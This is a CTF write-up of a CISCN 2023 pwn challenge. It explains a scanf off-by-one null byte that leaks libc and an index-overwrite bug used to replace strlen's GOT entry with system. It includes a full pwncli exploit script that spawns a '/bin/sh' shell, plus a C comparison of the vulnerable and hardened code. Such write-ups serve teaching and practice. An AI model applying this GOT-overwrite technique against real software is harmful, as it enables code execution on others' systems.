BuringStraw

CISCN 2023 Northeast Regional pwn

(Slow update 1/4)

Novice Challenge

One-sentence summary: overwrite the GOT entry of strlen.

First, leak the libc address from sub_96B:

int sub_96B()
{
  int v1; // [rsp+Ch] [rbp-264h] BYREF
  __int64 v2[44]; // [rsp+10h] [rbp-260h] BYREF
  char v3[252]; // [rsp+170h] [rbp-100h] BYREF
  int v4; // [rsp+26Ch] [rbp-4h]

  v4 = 4;
  puts("Welcome to this challenge!");
  v2[0] = (__int64)&puts;
  __isoc99_scanf("%252s", v3);
  puts("Good luck!");
  __isoc99_scanf("%d", &v1);
  if ( v1 > 15 && v1 <= 21 )
    v4 = v1;
  else
    puts("No!");
  puts("gift:");
  return puts((const char *)&v2[v4]);
}

The goal is to make sub_96B print v2[0], which holds the address of puts.
scanf with %252s stores up to 252 characters and then appends a terminating null byte, which the width limit does not count. v3 is 252 bytes long and sits at rbp-0x100, so that null byte lands on the low byte of v4 at rbp-4 (252 = 0xFC and 0x100 - 0xFC = 4). Entering exactly 252 characters therefore turns v4 from 4 into 0. Then enter a number outside 16..21 so the if branch is skipped and v4 keeps its value, and the final puts prints v2[0].

Next, let's look at:

int sub_A31()
{
  size_t v0; // rax

  puts("index>>");
  __isoc99_scanf("%d", &dword_2020BC);
  if ( (unsigned int)dword_2020BC >= 0x20 )
  {
    puts("No!");
    exit(1);
  }
  puts("input>>");
  read(0, byte_2020A0, 0x20uLL);
  v0 = strlen(byte_2020A0);
  printf("data length is %d\n", v0);
  puts("bye~");
  read(0, &byte_2020A0[dword_2020BC], 4uLL);
  return close(1);
}

byte_2020A0 is a 0x20-byte buffer and dword_2020BC lies inside it at offset 0x1C (0x2020A0 + 0x20 = 0x2020C0 > 0x2020BC), so the 0x20-byte read into the buffer overwrites the index after its bounds check has already run, and the final 4-byte read lands wherever the new index points.
The index is a signed int, so a negative value reaches backwards. The GOT entry of strlen is located at byte_2020A0 - 136, so the index is -136, written as the two's-complement 32-bit value 0xFFFFFF78.
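The check-then-overwrite pattern above, as an added C illustration (not the challenge binary's code): a constructed global layout in which the index variable sits inside the 0x20-byte input buffer, beside a hardened form that keeps the index out of any input buffer and validates it right before the write that uses it. `vulnerable_target` and `hardened_target` are hypothetical names; each returns the effective write offset relative to the buffer, or -1 when the input is rejected.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed mirror of the globals in sub_A31 (assumed layout, for illustration):
 * a 0x20-byte input buffer whose last 4 bytes are the index variable itself,
 * i.e. byte_2020A0 + 0x1C == dword_2020BC. */
struct globals_vuln {
    union {
        unsigned char data[0x20];
        struct { unsigned char head[0x1C]; int32_t index; } ov;
    } u;
};

/* Vulnerable order of operations: validate index, then read 0x20 bytes into the
 * buffer (which also overwrites index), then use index without re-checking.
 * smuggled is the value the caller places in the last 4 bytes of the input. */
long vulnerable_target(int32_t index, int32_t smuggled) {
    struct globals_vuln g = {0};
    unsigned char input[0x20] = {0};
    memcpy(input + 0x1C, &smuggled, sizeof smuggled); /* these bytes land on index */

    g.u.ov.index = index;
    if ((uint32_t)g.u.ov.index >= 0x20)   /* the only check; negatives are huge unsigned */
        return -1;
    memcpy(g.u.data, input, sizeof input); /* read(0, byte_2020A0, 0x20) */
    return g.u.ov.index;                   /* stale check: the read replaced index */
}

/* Hardened form: index lives outside every input buffer, and the bounds of the
 * 4-byte write are checked immediately before it happens. */
long hardened_target(int32_t index, int32_t smuggled) {
    unsigned char data[0x20] = {0};
    unsigned char input[0x20] = {0};
    memcpy(input + 0x1C, &smuggled, sizeof smuggled);

    memcpy(data, input, sizeof data);      /* input cannot reach index */
    if (index < 0 || index > (int32_t)(sizeof data - 4)) /* 4-byte write must fit */
        return -1;
    return index;
}

int main(void) {
    printf("vulnerable: %ld\n", vulnerable_target(0, -136)); /* -136: 0xFFFFFF78 as int32 */
    printf("hardened:   %ld\n", hardened_target(0, -136));   /* 0: smuggled bytes are inert */
    printf("hardened:   %ld\n", hardened_target(-136, 0));   /* -1: rejected */
    return 0;
}
```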

Exp:

#!/usr/bin/env python3

from pwncli import *

cli_script()

libc: ELF = gift.libc
filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug


if gift.remote:
    libc = ELF("./libc.so.6")
    gift[libc] = libc

sla("challenge!", "a" * 252)

sla("luck!", "0")

lb = recv_current_libc_addr(0x80970, 0x1000)

libc.address = lb

leak_ex2(lb)

sla("index>>\n", "0")

sa("input>>", flat({0: "/bin/sh;", 0x1C: p32(0xFFFFFF78)}))
print(hex(libc.sym.system))
sa("bye", flat(libc.sym.system)[:-4])

rl()
ia()

Notes:

  1. Later slots of the v2 array in sub_96B hold a function address from ld.so (it only appears when running with the target libc version), see: https://www.cnblogs.com/7resp4ss/p/17530599.html

  2. Use patchelf to replace both the program's libc and its ld.so (interpreter). Replacing only libc may cause problems.

patchelf --set-interpreter /home/w1nd/Desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so /home/w1nd/Desktop/pwn
patchelf --replace-needed libc.so.6 /home/w1nd/Desktop/buu/libc-2.23-x64.so pwn

  See: https://www.cnblogs.com/xshhc/p/16777707.html

  3. Linux ELF and dynamic linking libraries: https://juejin.cn/post/6939332933677219848
